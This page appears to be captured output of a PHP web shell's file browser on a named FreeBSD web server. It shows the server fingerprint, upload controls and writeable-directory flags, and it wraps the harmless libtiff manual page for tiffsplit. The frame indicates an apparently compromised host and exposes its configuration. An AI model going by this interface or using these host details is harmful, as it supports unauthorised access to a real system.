KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /usr/local/share/doc/tiff-4.6.0/manual/_sources/tools/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/share/doc/tiff-4.6.0/manual/_sources/tools/tiffsplit.rst.txt
tiffsplit
=========

.. program:: tiffsplit

Synopsis
--------

**tiffsplit** *src.tif* [ *prefix* ]

Description
-----------

:program:`tiffsplit` takes a multi-directory (page) TIFF
file and creates one or more single-directory (page) TIFF
files from it.
The output files are given names created by concatenating
a prefix, a lexically ordered suffix in the range [aaa--zzz],
the suffix :file:`.tif`
(e.g. :file:`xaaa.tif`, :file:`xaab.tif`, :file:`…`, :file:`xzzz.tif`).
If a prefix is not specified on the command line, the default prefix of
:file:`x` is used.

Options
-------

None.

Exit status
-----------

:program:`tiffsplit` exits with one of the following values:

0:

  Success

1:

  An error occurred either reading the input or writing results.

Bugs
----

Only a select set of "known tags" are copied when splitting.

See also
--------

:doc:`tiffcp` (1),
:doc:`tiffinfo` (1),
:doc:`/functions/libtiff` (3tiff),

Anon7 - 2021